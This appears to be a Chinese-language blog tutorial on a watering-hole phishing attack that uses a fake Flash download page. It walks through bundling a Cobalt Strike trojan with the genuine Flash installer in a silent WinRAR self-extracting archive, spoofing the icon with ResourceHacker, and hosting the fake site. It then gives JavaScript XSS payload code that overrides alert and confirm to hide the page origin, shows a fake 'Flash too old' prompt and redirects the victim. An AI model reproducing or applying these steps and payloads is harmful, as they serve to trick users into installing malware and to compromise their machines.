Flash水坑钓鱼

起因

在网络上看到许多大佬都拿这个钓鱼，而且感觉成功率贼高。
未雨绸缪，先测试一下，以后肯定用的到

准备

flash官网的钓鱼源码：https://github.com/r00tSe7en/Fake-flash.cn
一个服务器
一个域名
一个马子

先配置一个马子吧

• 使用常用的CS吧，随便来一个，成功上线
  
• 关于免杀，暂时就不了(因为菜)
• 推荐使用一个好的隐藏方式

自解压捆绑文件的利用

捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀，所以选择利用winrar实现捆绑。

1. 准备好的木马和flash安装程序

2. 鼠标右键，添加到压缩文件。

点击创建自解压格式压缩文件

4. 点击高级自解压选项-------------------常规

使用绝对路径 -------------- C:\windows\temp

4. 设置---------提取后运行

C:\windows\temp\flash.exe

C:\windows\temp\flashplayer_install_cn.exe

5. 安静模式---------全部隐藏

6. 更新

更新方式----解压并更新文件

覆盖方式----覆盖所有文件

7. 确定，出去把文件名改的像一点
   
8. 这图标也不像啊，得改
   
9. 使用 ResourceHacker 把图标改了，自行下载
10. 通过ResourceHacker打开原版的flash安装程序，点击Icon Group文件夹中的文件，鼠标右键保存“*.ico资源”，即可导出ico图标。
    
11. 同样的方法----ResourceHacker打开刚刚打包好的文件，点击Icon Group文件夹中的文件，鼠标右键替换ico图标，最后保存

最后保存成功，图标搞定

• 捆绑木马就做好了。下面是运行截图，伪装的完美，全程无感知，就是没有做木马的免杀如果有杀毒软件会报毒。
• 
• 也能上线
• 马子完成了。

上传到服务器

跟前情况自己开服务，我就直接装了了一个Apache

修改fake网站的源码，把链接加进去。

上传到服务器看效果

还可以，就是域名方面需要进一步的伪造，要买一个不错的域名更佳

常见用法

直接给地址让下载这个可能性太低了，感觉还是需要XSS打进去，弹框提示上钩的几率最大，这也大家常用的方法之一。
但是有个问题不能让看出是弹窗，最后是可以隐藏掉网站显示

//重写alert方法，去掉地址显示
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}

//重写confirm方法，去掉地址显示
window.confirm = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
var result = window.frames[0].window.confirm(name);
iframe.parentNode.removeChild(iframe);
return result;
}
  

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低，请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";

可以直接在XSS平台里面建一个模块，然后xss打出去，要不太长了代码